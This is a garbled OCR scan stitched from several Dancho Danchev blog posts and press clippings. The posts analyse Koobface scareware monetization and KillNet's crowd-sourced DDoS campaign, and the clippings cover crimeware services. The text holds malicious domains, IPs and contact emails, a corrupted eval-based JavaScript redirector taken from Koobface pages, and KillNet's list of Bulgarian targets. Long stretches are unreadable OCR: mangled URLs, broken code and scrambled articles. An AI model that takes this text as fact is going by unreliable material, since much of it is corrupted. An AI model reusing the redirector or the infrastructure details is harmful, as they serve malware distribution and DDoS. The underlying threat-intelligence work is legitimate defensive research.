waveadvert .com - Email: lindahg@yahoo.com 


As always, what would originally seem as an isolated incident orchestrated by yet to be 
analyzed cybecrime gang, is in fact a great example of [14]underground multitasking in 
action through the convergence of [15]different attack tactics, courtesy of a single cybercrime 
enterprise. 


Related malvertising posts: 
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[11] 


[12] 
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[13] 


[14] 
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[15] 


[16] 
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[17] 


[18] 
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[19] 


[20] 
25787 


[21] 


[22] 
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[23] 


[24] 
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[25] 


[26] 
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[27] 


[28] 
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[29] 


[30] 
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[16]Malicious Advertising (Malvertising) Increasing 

[17]MSN Norway serving Flash exploits through malvertising 
[18]Fake Antivirus XP pops-up at Cleveland.com 
[19]Scareware pops-up at FoxNews 


This post has been reproduced from [20]Dancho Danchev’s blog. 


. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 
ttp://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 
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3. http: //countermeasures.trendmicro.eu/new-york-times-pushes-fake-av-malvertisement/ 
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_netp://aganchev. blogspot .con/2009/0B/dsssecting-ongoing-us~federal-forss heal 

_http://ddanchey. blogepot .con/2009/08/ dissect ing~ongoing-us~federal— forms hea 

_http://adanchev. blogspot .con/2009/0B/issecting-ongoing-us-federal—forms. hea 

10, jeep: //adanchev blogspot .con/2008/09/news~itens thened~ blackhat~se0~canpaign tal 

1, htvp://wiv.virustotal con/analisis/46015a6926¢1014e821<5£82d21c7aaG8a60290d250134b1A408446845p15e1- 19529 
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12. http: _yort. -of-a- -ad-on-nytimes- 


13. 
15, 
16. 
17. 


18. http://blogs.zdnet .com/security/?p=251 
19. http://blogs.zdnet .com/security/?p=3140 
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5.9.6 Koobface Botnet’s Scareware Business Model (2009-09-16 20:45) 


S* Video + Upload © Record 
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share your prrional vxdcou 
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your credit rating 


am a 
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39. _, 
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UPDATE1: TrendMicro just confirmed the ongoing [1]double-layer monetization of Koobface. 
Meanwhile, the gang is rotating the scareware domains with new ones pushed by popup.php, 
followd by two recently updated Koobface components. 


The [2]new scareware domains kjremover .info; Irxsoft .info - 212.117.160.21 - Email: 
niclas@i.ua actually [3]download it from the well known q2bfOfzvjb5ca .cn portfolio, which 
phones back to the same domains listed previously, with only a slight change in the filename 
- urodinam .net/8732489273.php. The generic detection rate for the updated components 
(61.235.117.83 /bin/[4]get.exe; 61.235.117.83 /bin/[5]v2webserver.exe) with get.exe phoning 
back to a domain parked at the takedown-proof, China-based 61.235.117.83, in particular 
gdehochesh .com/adm/index.php. 


Just like Conficker, the [6]Koobface botnet is no stranger to the [7]scareware business 
model and the potential for monetization of the hundreds of thousands of infected hosts. 


However, changes made in the campaign structure of the Koobface botnet during the 
last couple of days, indicate that the Koobface gang has embedded a pop-up at each and 
every host that’s automatically rotation different scareware brands. They’re now officially 
monetizing the botnet using a scareware business model. 
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Let’s analyze the latest changes introduced by the Koobface gang over the last couple 
of days and emphasize on the monetization tactics introduced by the gang. 


Weparest » JevaScriot Report for btte<//90.40,104. 169)0368/ 


[ 

{ 

{'syspace.com', ‘ms'), 
{‘maplinks. ; 

{' ink.=s', 
{‘syyearbook.com',' yb"), 
{ 

{ 

{ 

{ 

) 

vi 


Var wnfextduvsylepjiqod = [ 
*90.40.164.169', 


', folgacrpié = '', ryvgpeS = "', yomgyfseajzkihvxpovbu2 = '': 
var roatjidxe: iyges = '' + eval(' +s0acb¥rux6é+' ‘+folgacrpié+'nt.c' eryvgpmSe efer' +ycmgfseajrkihvxpovbuze¢'rer’), uojdpitksbald = ‘'!: 
for (var vszeporitvexnft)5 = 0: wszep th: wszeporitvcxatjs ++ 


if ((roatjfdxecqruniygms. indexoOr (p t= ~1)) ¢ 
wojdpitksbalO = ‘/f' + pjirxkbdS[wsseporitvexntj5) (1): 
break: 


[8]Next to [9]Jinsulting, showing [10]gratitude, the [11]Koobface gang also has a (black) sense 
of humor - within one of the directories at the takedown-proof command and control used 
by the gang in China ([12]61.235.117.83; at 61.235.117.83/bin in particular) they’ve left the 
following message "2008 ali baba and 40, LLC". [13]Ali Baba and the Forty Thieves is a 1944 
film based on the original [14]Ali Baba character. 


Compared to previous campaigns relying on centralized command and control and redirection 
points - making them easy to shut down - the ongoing Facebook campaigns are dynamically 
redirecting to IPs within the Koobface network, which combined with their use of compromised 
legitimate sites is supposed to make the take down of their campaigns a bit more time 
consuming. 
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immediately! 


Registry doctor 


Security under threat! zz 


The component providing security 
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of protection. Make sure that all Firewall 


That’s, of course, not the case since undermining their monetization approaches undermines 
the monetary value of their campaigns, which is what they’re after this time. The Koobface 
gang has now embedded a single line within each and every infected host used in the 
campaign, in order to not only attempt to infect new visitors with the Koobface malware itself, 
but to also trick them into installing the scareware which is rotated as usual. 


dangerWindAdr = 61.235.117.83/ popup.php loads on each and every Facebook spoof 


page part of the botnet and is then redirecting the most popular scareware template, the My 
computer Online Scan. 
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The first scareware domain used in the last 48 ryacleaner .info/hitin.php?affid=02979 
(212.117.160.211 parked there as also eljupdate .info Email: niclas@i.ua and dercleaner .info 
Email: niclas@i.ua) was serving setup.exe which is downloading the actual [15]scareware 
executable from mt3pvkfmpi7de .cn/get.php?id=02979 (220.196.59.23). 


What’s so special about this domain? It was last profiled in the [16]A Diverse Portfolio of Fake 
Security Software - Part Twenty Three with the entire portfolio of .cn domains parked at the 
same IP registered under the same email - robertsimonkroon@gmail.com. 


The second scareware domain pushed by the Koobface during the last 24 hours, 
gotrioscan .com/?uid=13301 - 91.212.107.103 - momorule@gmail.com redirects to plazec 
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.info/22/?uid=13301 - 91.212.107.103 - Email: bebrashe@gmail.com where the [17]scareware 
is served. Parked at the same IP is the rest of thescareware domains portfolio pushed by 


Koobface: 


in5id .com 

in5ch .com 
goscanback .com 
goscanlook .com 
gofatescan .com 
goeachscan .com 
gobackscan .com 
goironscan .com 
gotrioscan .com 
ia-pro .com 
iantivirus-pro .com 
iantiviruspro .com 
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in5st .com 

zussia .info 
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Stay tuned! 
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18.10.12 Inside the KillNet Crowd-Sourced DDoS Attack Campaign Targeting Inter- 
national Web Sites - An OSINT Analysis (2022-10-26 08:28) 
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declin .info 


inclin .info 
unclin .info 
towton .info 


grumio .info 
stampo .info 
extrip .info 


oS Tasks ) Sw ow Owe (C:) — Local Dise (D:) 
Views system information 


3S Add or remove programs (- 
o Ot é OVD RAM (FF) i) Shared Doaments 


System errors detected. To prevent data lost system scanning ts started 


Scanning seeeeeeeee 


Object: C:\WINDOW'S Ve lexWebSnapd7.bpt 


Hardware errors 
Perfomance of your PC is low due to a file system error. It was caused by the 


changes maicous software made in your system files and numerous open ports used 
by spyware to transfer your privacy data. Your personal data safety in danger. 


Privacy information errors 


Spyware has stolen your personal informaton. 
You can see the contents of the stolen block below: 


‘aia 


scanning your system for threats. The scanning is provided by our official partner Internet Antivirus Pro. 
Please refrain from closing the window until the scanning it finished. 
We highly recommend you to install the full version of Irternet Antivirus Pro scammer to monitor your PC for thrests and on-time security system 


Cox) 
polear .info 
benber .info 
kedder .info 
erpeer .info 
argier .info 
fulier .info 
lavyer .info 
inquir .info 
orodes .info 
faites .info 
beeves .info 
quoifs .info 
filths .info 
broths .info 
nevils .info 
swoons .info 
sallat .info 
apalet .info 
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USA OFFLINE 


FUCK NATO 


I’ve decided to take a deeper look inside the currently ongoing crowd-sourced DDoS infrastruc- 
ture platform known as KillNet where multiple pro-Russian groups including various Pro-Ukraine 
groups are basically soliciting users internationally to "donate" their bandwidth to a central 
command and control server under the operation of KillNet botnet operators that further or- 
chestrate the actual Target List and the actual DDoS attack campaigns. 


What’s new here? Nothing really as crowd-sourcing DDoS attacks has been around for a while. 
It doesn’t take a rocket scientist to entice a thousand users into installing a rogue and bogus 
crowd-sourced DDoS attack application under a central management command of KillNet who 
will be responsible for issuing managing and updating the Targets List that also includes the 
actual launching of the DDoS attack campaigns. 


Sample screenshots include: 
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WE ARE KILLNET 
Oh Bulgaria is a traitor .... 449% @ 19:31 


WE ARE KILLNET 
Attention to all law enforcement agencies in Bulgaria!!! J 


For your support of the Ukrainian dictatorship and the development 
of Nazism, with the help of your arms supplies through the “corrupt 
Romanian government” From now on you are included in the list of 
our enemies. 


Now we have 11 victims of domestic violencegg 


It would be right to give time to the "Bulgarian special services" until 
7 am Moscow time to prepare for a meeting with us! 


This will be an unforgettable date. @ 49.3K © 19:40 


October 15 
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WE ARE KILLNET 


Ahttps://www.statereserve.bg - state reserve of Bulgaria 
https://check-host.net/check-report/d24c3b4k4fa 


@https://csd.bg - center for the study of democracy 
https://check-host.net/check-report/d24c4cbkd94 


@http://bgports.bg - Bulgarian ports 
https://check-host.net/check-report/d24b004k49f 


@https://www.marad.bg - maritime administration 
https://check-host.net/check-report/d24c7b0k45d 


@https://www.bulatsa.com/en/ - air traffic control 
https://check-host.net/check-report/d24c8c2kba0 


@https://beci2001.com/ - chemical industry 
https://check-host.net/check-report/d255ea8k6b0 


@https://www.rbb.bg - RBB bank 
https://check-host.net/check-report/d24f2fekc93 


@https://dskbank.bg/ - DSK bank 
https://check-host.net/check-report/d24ce8dk4ce 
47.7K © edited 18:12 
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WE ARE KILLNET 
@killnet_reserves 


94.1K 1.12K 454 23 779 
Subscribers Photos Videos Files Links 


© Donations: @donate_killnet 

@ Our official @kilinet_reservs 

@ Support @kilinet_support 

© Founder @killmilk_rus 

O€Exchange https://t.me/NettoExchange 
© Backup @killnet_mirror 
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About Blog Apps platform 
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© Donations: @donate_kilinet 
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About Blog Apps platform 
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a @) lockheedmartin.com/en-us/indexh @ A 


504 ERROR 


Toggie naigatin | The request could not be satisfied. 


Tomy Account Maintenance a 
it CloudFront attempted to establish a 


connection with the origin, but either the 
attempt failed or the origin closed the 
connection. We can't connect to the server for 
this app or website at this time. There might 
be too much traffic or a configuration error. 
Try again later, or contact the app or website 
owner. 

henry erate leer | . Ifyou provide content to customers through 

services arRbentuetys§ CloudFront, you can find steps to troubleshoot 

clad ag ; s and help prevent this error by reviewing the 


customers and eoileg/ CloudFront documentation. 
request and manag 


Jlyuwasa B Mupe cuctema 3auuTb! Akamai oTBanunacb 
ot Lockheed Martin. Bo3MO>KHO OHV NOHANU YTO HE 
HY>XHO NOMOraTb TeppopucTam! 


WE ARE KILLNET 8.5K @® 10:49 


L 
f 


Sample URLs known to have been involved in the campaign include: 
hxxp://killnethackers.com 


hxxp://killnet.tilda.ws 


1. hetpa:/elogger.googleusercontent. con/ing/b/R29v22:0 /AVWRaELOKZ juied7sCeiyObTxiq_ pid jPamkBoPSqZEN7ULAIXCH 
2. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhnsr 3N3x8wuqRHvW32ZGzfmInfNY 18V2 jmjheLSrPRqBhB7 
3, hicnps://blogger .googleusercontent con/sng/b/R29vZ2n1/AVWI3E I qbUPI:  SenEiNY T2PYABMIEV-uSughFSESW2poaCIaNG 
4. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEhkCwebYrrXDp0s0005hxLN-DfVW7FQUwXinV1VAkJYwAFO7 
5. 
6. hteps:/ blogger. googleusercontent.con/ing/o/R29v22x1 /AVWEsEAGcbohq(lLIKAPleDJyZJS9UCiNaCviIQ9DREBXLRAYZSKP9 


7. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEgukMCPRhY5Mc i 3uwBc7ATqSHE_Fani7ZxVLCWonw0p-OH5C 
nGLABuyy100r01lkrieIPafZYYASibRUY4Wanf jxvQBVEVZ7BxzE-5R 


18.10.13 My New RSS Feed (2022-10-26 08:28) 


[1] 


Dear blog readers, 
Here’s my new [2]RSS feed. Please update your bookmarks. 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEj 2qZNxhTyMg2PW6A4Rg0Wyi 8RW17nBDaoOsnetHVkRzPkH 
sEEzbOsN5HnsWsS0nGzzFY1u602T3£19Q- Ac64TsCO14qg5IFIEVAX9 
2. https://feedpress .me/DanchoDanchevOnSecurityAndNewMedia 


18.10.14 Dancho Danchev - The Re-Surrection - 2022 - Official Come Back Or a "Brief 
History Into the World of Hacking Security Blogging OSINT and Threat In- 
telligence Gathering" - A Guide To The Scene (2022-10-26 08:28) 


[1] 
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Hello everyone, 


Are you enjoying my new layout? I’ve finally managed to find a decent layout that’s worth the 
efforts for my blog and | think that you'll enjoy it. 


[2]Grab the Torrent. 
Who needs a motto of some sort? Check out the following: 


- "Setting them straight since the early days of humankind!" 
- "If it’s going to be massive it better be good". 
- "Only the enlightened". 


- "The Third World war will be fought with sticks and stones. Our war will be fought with cyber 
sticks and stones". 


- "You shall obfuscate. | shall deobfuscate". 
25880 


- "Takes you back doesn’t it?" 


- "Cybercrime is largely driven by the average time for which it takes to collectively and fully 
satisfy the botnet masters for the time it takes to build a botnet and maintain it online". 


- "When we're back on top, back on top in January, 2009, | say that loads.cc, loads.cccccc and 
it ain’t that aspiring as it seems, you’re aggregating botnets 


in September, face the abuse department’s music in June, but | know I’m going to see your IPs 
again, cause this fine cybercrime ecosystem, it just keeps spinning around." 


The reason for using it? | truly want to present as much information as possible ina much more 
structured way than before and | finally found a suitable template for this purpose. 


In this all-in-one blog post I'll attempt and I’ll do my best to present the true story behind my 
blog which you can by the way download in a full offline reading mode here with the idea to 
present my true story since December, 2005 when | originally launched it while working at 
https://astalavista.com as a Managing Director. 


[3] 
25881 


herdProtect 


Current social media accounts you can find me on: 


¢ [4]Twitter 


¢ [5]LinkedIn 


¢ [6]Facebook 


¢ [7]Medium 


¢ [8]Speakerdeck 


¢ [9]Substack 


An image is worth a thousand words: 


[10] 
25882 


reglet .info 
camlet .info 
plamet .info 
hownet .info 
fosset .info 
cuplift .info 
raught .info 
holdit .info 
unroot .info 
unwept .info 
anmast .info 
ticedu .info 
outliv .info 
onclew .info 
froday .info 
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Competitors 


Identified Competitors * iDefense Labs (US) 
Cyber Defense Agency (CDA) * JET Intelligent Risk Systems (US) 
(US) * Informatica (US) 
Cyber Security Research and * 1T—Information Sharing and 
Development Center (US) Analysis Center (US) 
Cyveillance (US) » iSIGHT Partners (US) 
Dancho Danchev (EU) * Lookingglass (US) 


Department of Homeland * Multi-State Information Sharing 
Security US-CERT(US) Analysis Center (US) 


Ernst & Young (EU) « nCircle (US) 

EWA Information and *« SecureWorks (US) 
Infrastructure Technologies, Inc * Trend Micro (US) 

(US) * United States Cyber 
Fortify (US) Consequence Unit (US) 
Global Security Mag (EU) 


[11] 


5.3 Understanding Intelligence Sources 

The availability of the longitudinal data (the IOCs collected over 
a span of 13 years) also enables us to investigate the qualities of 
the indicators produced by different sources and their timeliness 
against new threats, as reported below. 


Timeliness. Using the aforementioned attack clusters (see Table 7), 
we analyzed the distribution of the articles first reporting the at- 
tacks over different blogs, as shown in Figure 8b. We found that 10 
blogs were responsible for the first report of 60% the clusters (each 
cluster likely to be a campaign). For example, the blog Dancho 
Danchev first report 12 clusters, each time involving 45 IOCs on 
average, Which later also showed up on other blogs. 


[12] 


Table 9: Quality of selected intelligence sources (10 out of 45) 


Dancho Danchev 84% 
Naked Security 45% 
THN S1% 
Webroot 84% 
ThreatPost 29% 
TaoSecurity 68% 
Sucun 52% 
PaloAlto 87% 
Malwarebytes 72% 
Hexacorn 76% 
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Table 5; Top-10 origins that contribute with the highest number of IOCs, grouped per source. In brackets we report the percentage 


of IOCs associated to each origin. 
‘Webooot (27.92%) Palo Alto Networks (4.16%) Dancho Danchev's Blog (26.21%) cytseccurity (76. : 

#2) Palo Also Networks ( 7.18%) Swcuri (22.07%) Trend Micro( 4.11%) Blockchain on Medium ( 9.06%) VulnerabilityNews ( 3.28%) threatmeter ( 4.7.46) 
LA Norman (6.11%) Malwarebytes (15.01%) Kaspersky ( 2.92%) Cybersecurity on Medium ( 8.63%) Cyber_Secerity_Channel ( 7.33%) malwrhunterteam ( 2.54%) 
“ Symantec (5.24%) Virus Bulletin (14.12%) ESET ( 2.82%) Cisco Talos ( 6.57%) Kure ( 4.01%) bgpstream ( 202%) 
"s ClearSky (4.74%) Sophos ( 4.88%) Proofpoint ( 1.68%) BloopingCoenpater News ( 2.44%) malwr( 2.18%) YourAsonRiots ( 1.54%) 
"6 FiseEye (4.24%) Forceposet ( 4,60) Cisco Talos ( 166%) Cotetelegraph.coen News ( 2.33%) androsdMalware(O.84%)  crypeolacenas! ( 144%) 
"7 BESET ¢ 3.72%) ESET ( 4.34%) PireEye ( 1.65%) PS Labs ( 1.28%) cheRED ( 0.48%) ActorExpose ( 1.32%) 
* Trend Micro ( 2.67%) TaoSecumty ( 4.15%) BuDefender ( 1.44%) Sehneter on Security ( 1.26%) canyoupwame (0.16%) MalwarePatrol (0.98%) 
” Citizen Lab ( 2.40%) Hexacoen ( 1.70%) MOnetlab ( 1.59%) Malwarebytes Labs ( 1.12%) itsecalert ( 0.03%) barre (O97) 
#0 Pe UK Blogs ( 1.88%) Roger McClinton ( 0.90%) Microsoft ( 1.34%) contagiodump ( 1.08%) . Gebatard (0.74%) 

RSS 

Dancho Danchev’s Blog (26.21%) 

Blockchain on Medium ( 9.06%) 

Cybersecurity on Medium ( 8.63%) | 

Cisco Talos ( 6.57%) 

BleepingComputer News ( 2.44%) 

Cointelegraph.com News ( 2.33%) 

FS Labs ( 1.28%) 


Schneier on Security ( 1.26%) 
Malwarebytes Labs ( 1.12%) 


ntagiodump ( 1.08%) 
[14] contagiodump 
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in the origins. Surprisingly, the top contributor is the personal blog 
from Dancho Danchev, followed by two Medium blogs that aggre- 
gate blockchain and cybersecurity news. The RSS top-10 is rounded 
by the research labs of three large companies (Cisco, F5, Malware- 
bytes), two other personal blogs (Bruce Schneier, contagiodump), 
and two magazines (Cointelegraph.com and BleepingComputer). 
Interestingly, two of the RSS top 10 origins focus on blockchain. We 
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CAL Automated Threat Library (ATL) Supported Blogs 
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| Dancho Danchev's Blog | https://feeds.feedburner.com/DanchoDanchevOnSecurityAndNewMedia | 


What’s the story? In this rather long article and a blog post I'll attempt to share my story 
through my own perspective since December, 2005 with the idea to fill everyone in some of 
my past and current projects. 
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Here come the visitors: 
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VISITOR ANALYSIS 


Host Name Cod cia.gov 


IP Address | Label IP Address] 
Country United States 
Region District Of Columbia 
City Washington 
ISP Central Intelligence Agency 
Returning ¥isits 0 
¥isit Length 0 seconds 
VISITOR SYSTEM SPECS 
Browser 
Operating System 
Resolution 
Javascript 
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VISITOR ANALYSIS 


Host Name lucia,.gov 
IP Address eed (Label IP Address] 
Country United States 
Region District Of Columbia 
City Washington 
ISP Central Intelligence Agency 
Returning ¥isits ak 
¥isit Length 44 seconds 
VISITOR SYSTEM SPECS 

Browser 

Operating System 

Resolution 

Javascript 


Navigation Path 


Date Time WebPage 
12th June 2007 13:55:17 


12th June 2007 13:55:32 
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PPR centra Intelligence Sgency) [Label IP Address] 


District Of Columbia, Washington, United States, 0 returning visits 


Date Time WebPage 
1ith June 2007 19:01:52 


11th June 2007 19:02:07 
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VISITOR ANALYSIS 


Referring Link No referring link 
Host Name cia.goy 
IP Address ed (Label IP Address] 
Country United States 
Region District Of Columbia 
City Washington 
ISP Central Intelligence Agency 
Returning ¥isits 0 
¥isit Length 0 seconds 
VISITOR SYSTEM SPECS 

Browser 

Operating System 

Resolution 

Javascript 


Navigation Path 


Date Time WebPage 
13th June 2007 20:44:36 No referring link 
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Host Name Co ce cov 


IP Address CJ Label IP Address] 
Country United States 
Region District Of Columbia 
City Washington 
ISP Central Intelligence Agency 
Returning Visits 0 
Visit Length 1 min 53 secs 
VISITOR SYSTEM SPECS 

Browser 

Operating System 

Resolution 

Javascript 


Navigation Path 


Date Time WebPage 
25th June 2007 13:38:42 
25th June 2007 13:38:56 


25th June 2007 13:40:35 
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Referring Link ae 


Host Name Cd bi .gov 
IP Address ——e) [Label IP Address] 
Country United States 
Region Illinois 
City Oregon 
ISP — 
Returning ¥isits 2 
¥isit Length 1 hour O mins 0 secs 
VISITOR SYSTEM SPECS 

Browser 

Operating System 

Resolution 

Javascript 


Navigation Path 


Date Time WebPage 
2nd November 2007 13:36:16 


2nd November 2007 13:42:10 


2nd November 2007 14:36:16 
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Pensa ov C3 abel 1p address] 


Maryland, Columbia, United States, 8 returning visits 
Date Time WebPage 
17th October 2007 13:39:47 
17th October 2007 13:45:28 
17th October 2007 13:46:22 
17th October 2007 13:46:26 
17th October 2007 13:46:47 
17th October 2007 13:47:00 


17th October 2007 16:11:33 
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Referring Link No referring link 
Host Name Cd :2.00v 


IP Address Ce] (tabe! IP Address] 
Country United States 
Region Maryland 
City Columbia 
ISP _ | 
Returning ¥isits 8 
¥isit Length 6 hours 54 mins 47 secs 
VISITOR SYSTEM SPECS 

Browser 

Operating System 

Resolution 

Javascript 


Navigation Path 


Date Time WebPage 
13th November 2007 13:46:57 


13th November 2007 14:10:12 


13th November 2007 18:03:10 


[27] 
PE Fivtimes.com (The New York Times) [Label IP Address] 


New Jersey, Bergenfield, United States, 0 returning visits 
Date Time WebPage 
13th June 2007 19:47:40 
13th June 2007 19:59:48 
13th June 2007 20:03:49 
13th June 2007 20:04:44 
13th June 2007 20:04:49 
13th June 2007 20:06:41 
13th June 2007 20:06:43 
13th June 2007 20:06:54 
13th June 2007 20:07:13 
13th June 2007 20:07:14 


13th June 2007 20:09:38 


From the Me in the News: 
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The Rise of Malware as a Service (MaaS) 
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COMPUTERWORLD 


DEFENSIVE COMPUTING 


Oy are 20 nate 


Crimeware gets worse - How to 
avoid being robbed by your PC 


0o@O0000090 


Tre malware threat to Windows computers cortinwes te get wore So mach 
0. Tere's a new term to describe makoous sofware that traniters money 
oem Online BOCOUNES at franca! LERNCeS COMPANIES - Cremewatt 


Last week, an article at Teche Rida told about a construction firms that 
had $447,000 taken of of thew Bark account by creneware soMeare on one 
of Ter computers. What makes thes story pattoulaty eteresing 6 Pat he 
Ummurned Rana enployed one Ime passwords 


Perhaps you've seen the smal hey fobs that Gapiay a new password every 
minute, If you don't hawe the key feb, you can? logon. But the computer was 
aleeady intected and was beng used by a legtimate user. Retina scacners 
would not hawe prewertied the creme 


While De wel-veritied user was logged on, maiung leptmate varsiers. the 
Crereware somware generated 27 varsters 1 the space of a few mmtes 
According the firms present “They nat only got inte my system here. they 
were able to ascertan how much they could Gram. 60 Dey Grew the lent” = 
Can get anny worse 


What & do? 


Danche Danchey suggests toting “daly, weekly or monthly accourt 
Paraacton bert: 


arurnng you franca! eatt.ton allows ¢ He ako 
suggerts beng nottied of tansactora wa SNS 


Another posstalty 6 creating up ort. a lst of wald payees to Pat you 
francial watin.Gon won pay anyone net on the ist | know a company tat 
00s Tes and & protected hem trom forged paper payroll checks 


Ot course, the bark should fling suapeocus activity such as. a group Iransters 
just under $10,000, ary large oulliow of money, a collection of ranaiers to 
fnew, frattene paytes or multiple transters free a new PF address Maybe 
sorneday 


bere 
' Detente n Meas 


But when 4 Comes to your Computer, there 6 one Chvously Dest solution 


Do ontine banking trom Linu using Firefos. 


You can eun Linux on pretty much any computer from a CO. a USS fash 
Grve. an SD card of a Compact Flash card 


Liman @ thee You can download any of Garess of Gflerent versions (called 
“ried? in ISD) feerat aed Peon them tn a T) 
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SAMSUNG Knox | Galaxy S8 


@ —--- eee Tye oe 


Sony PlayStation site victim of 
SQL-injection attack 


Automated attack claims another high-profile target, offering 


sale of 6 fake antivirus scanner 


oy #onteT vawon oan a) 


splunk> 


~ Next Avticle Flash loses final appeal Adobe sentences its web tech to death 4 
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mayray .info 
tenshy .info 
steepy .info 
miloty .info 
debuty .info 
fifthz .info 
potinz .info 
caretz .info 
narowz .info 


What do these two scareware executables have in common? Its the phone back locations that 
the Koobface gang is using, reveling its participation in a scareware affiliate network called 


Crusade Affiliates. 
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ee ee The New ork Times 
=e Sr Sst oe P a 
domaine ie Fe Peery i 
Brand New 
Sttmectoer 


Web Gang Operating in the Open 


Fave men bekeved to be reaporaibte for tpreading a retorious computer 
orm On FacebOUn and Ofer socal Meteors — and pocketing sewers! 
(raion Gotary bom ordre Lihemnes — are Neding Wn plain Magne wy SE 
Peterniurg Pune according to inventigators at facebook and several 
(dependent Computer tecurty resemrehers: 


The men bee comtortapie wes mn St Petersiurg — ard Nave otched on 
Aamury wacatiora © paaces lke Monte Carte. Bal and. carter Drs morn 
Tuntay, according to photographs potted on Local netanrt Stes — even 
ough thew Gorétes Mave Deen mown tor years to f aceboom computer 
SCUNRy Crevnpators ard ine ertortenent ofc 


(Ore member of the group. afech is popularly Anown as the Mocbface gang. 
Nas reguiary bromdc ast he Coordinates of My oes by Checking non 
FOE RAME 2 CEDON CAGES LOCK METRO Bnd POSTING Tw fears 30 
Tether Photographs on Foursquare aise thow other muipected members 
Cf he Group working on Macs in & koftINe room Thal looks the oMices wed 
Dy OCP BLT DE ORES arenes he works 


Bagrrwrny in duty 2008. the Keuttace gang armed al Web uters et) 
lnrveatons to watch a tary oF tony video Those curess enough te cick 
the ink got a message to update ew computer's Flash sofware. whch 
begre the Ooertoad of the Kocttace makeare Viena computers are 
(ates into a Totret,” of network of tected PCs, and are sent oficial 
loctung advertisements of lake antvirus sofware and ther Web teaches 
re tt NyaChed andl he CickS Oetvered 1 Unscrgnions marketers The 
TAD Made moray TOM peapie WIND Dina he DORA WMewe and hor 
uneuapecting advertsers. 


The tacety tomaae tT Pater tay Labs Nas Obhmates Te feteore 
(echuSet 400,000 to 800 000 PCs morktande af @2 Meght n 2010 Witenes 
are Chen unaware Pree machirwes have been Compromaes: 


et oe 
‘The Bevhewstegy Betant Aare Neal be Comers on 
Comat Cotton | oicieeiaial hak 


ue Cato tee eatin gate n menses Verena eae (=) 


The Kocttace Oar § PeeCON werRCOres NOW Rand fm Bo appreranred 
(ternational computer orminais. even ahen Gerttes are krown These 
NES Nerd to Operate in Courts ohare Duty Can ert Urrelesio’ ty Pe 
OC RAPONDES ANI WHEE COREE ARON WE Unites States and Europea 
lan ertorcemert agerces = poot Uearwhie, Wetter ine entorcement a 
Smash 1h Commenter creme are) lacks Dre setcurces arn) shibes manpower to 
eae f OMe Dey CIpEcaty When ENCES PtiNG MAVICa trgers on 
Aeyboards must be cofected atroad 


On Tupsdany, Facebook plane 19 announce Tut t wil Depn Baring 
intormation about he group and how to fight them wilh securty retearchers 
and Ofer Peerret comparses Ml beteves Pulte Karergs Gan mane a harder 
for Gch Groups 1 Operate and Send a mettage to he Crmrat 
cero 


NO Of Te Pen Mae BOON CRANE WED 2 CON BS Mm lnm Onborcernent 
agence: have confirmed they are under investigation 


The PO Swvestpatons Nave mentand has adopted Te tongue © cheek 
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toruma Bom managed SMS flooding and phone rng flooding are pitches 
‘3t & means to lake Care of your Competio’s phone Ines’ or a D005 
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SOFTPEDIA’ NEWS 
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Customizable Mobile Number Harvesting Q Start searching now 7) 
Service Found on Underground Market 


ot tone ertvr 


Secunity experts Mave come across 2 new mobile amber harvesting service 
‘that allows uiers bo fully Customize the type of information they want to 
collect. The collected information can then be vtllined to drive SMS ipam 
Campaigns that rety on specialized services, 
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Cybercrime service automates creation of 
fake scanned IDs, other verification docs 


The service produces high-quality take scans 
victims, Group-IB researchers said 


oG@O000009 


Oy Lucien Constanen 


t can be used in fraud atiacks to inpersonate 


Anew Wet tased service tor cybercrminats atomates the creation of take 
scanned documents Put can help taudsters bypass the centty verification 
PrOCESLES Une by tome barks. @-commerce bummesses and other onine 
pervices providers. according i researchers from Russian cybercrene 


mrevigntons tem Grape B 


The service Can generate scanned copes of passports, ID cards and driver's 


hoerses from Stererst ¢ 


punts ty denthes supped by the service users. take 


Scanned tity bls foe various 


parves. as wel as take scanned comes of 
artery Saternerts and Cred! Cards maved Dy a lange numer of bares sad 


Arverey Kormaroy head of ternational proects at Group wa ernad 


Ris common practice tor barks, payment and money arate providers, ontine 


garrbiing ates and other types of busresses Thal engage n money ransactors 
Wi the Internet to ach their cuttomers for scanned copies of docurnents in order 
to prove thee certiies or verty ther pinsical addresses, eupecually mhen ther 

ar® baud Gopatirents Getect suapccut accourt activity 


[ Retsted: 4 pices to find cybersecurity talent in your own organization} 
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FESURS ane NeW On The CYLERCRITRa! Market Momo tied 


According to Grap & the servce 5 proweied Prough a webete hosted on a 
server m Germany The domxan rane mas rogatered m May buf Re service 


was launched 1 rad Aust Komarow sind 


InGepercent cyercmme researcher Dancho Oanchey Gescrbes a very seniar 


Bervice in a Jy biog post: howewer, Komarov coukd not contin whether t is the 


Sarre one because There mas no reference to the service's domain name 


Danchev's report 


The service found by Group 18 has templates tor passports. ID cards 


a) 
@iver's loenwes for he U.S Canada, Russia, he UK. Germany, he 
Netreertareds arid other European Urvon cGuntnes f alo Mas ternptates tor Dare 


Statements. credit cards ~ thont and Dack — ard utility bills tom Banks and utility 


COMPRES OPErAtiNg in those COUNTIES 


The ternpiates are for documents and cards that show signs of use and are 
scanned at dilererct anges and dferert posiers on the canvas Ths makes 
fhe resting erage appear more atherix 
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The Rise of Malware as a Service (MaaS) 


February 18. 2013 - botnets, images. Securty. Software 
gogo8 : 


© mitors Merkag Pagers 


‘The Internet in becoming o mine Ror criminats that tt an easy mary to access 10 ary Rind Of rescunces OF to arrange a Cyber attacks. @ cyber 
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Unegn 


Securty expen Dancno Dancners in a po! On Wretroct Treat Stag revealed Meaty lnnched undengournd service Ofer accent t Masands 
Of matware-rtectes mactune tor unsetlingly low prices a thousand US-Sased hosts costs $200 meanwite for a fhousand EU based hosts 
price varies Detween $409120, and Ihe prite tor & Trousand ternational mix type of hosts ts $20. 
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Servoes Pat ofer: a means to Wurch maraged SMS fooding and 
shone reg foodie have recety become aratatee trougt ete: 
forma Bo managed SMS flooding and phone rng flooding are pitches 
‘8 2 means to lake Care of your Competior’s phone Ines’ or a D005 
stack on phones matead of webaten However Pete sence: mgt 
panty lord Pemaetes to hepeng slong more aréibous scans uch as 
fooding out a barat cal centres to prevent earty reports of card baud 
cam out operators according to Webroot 

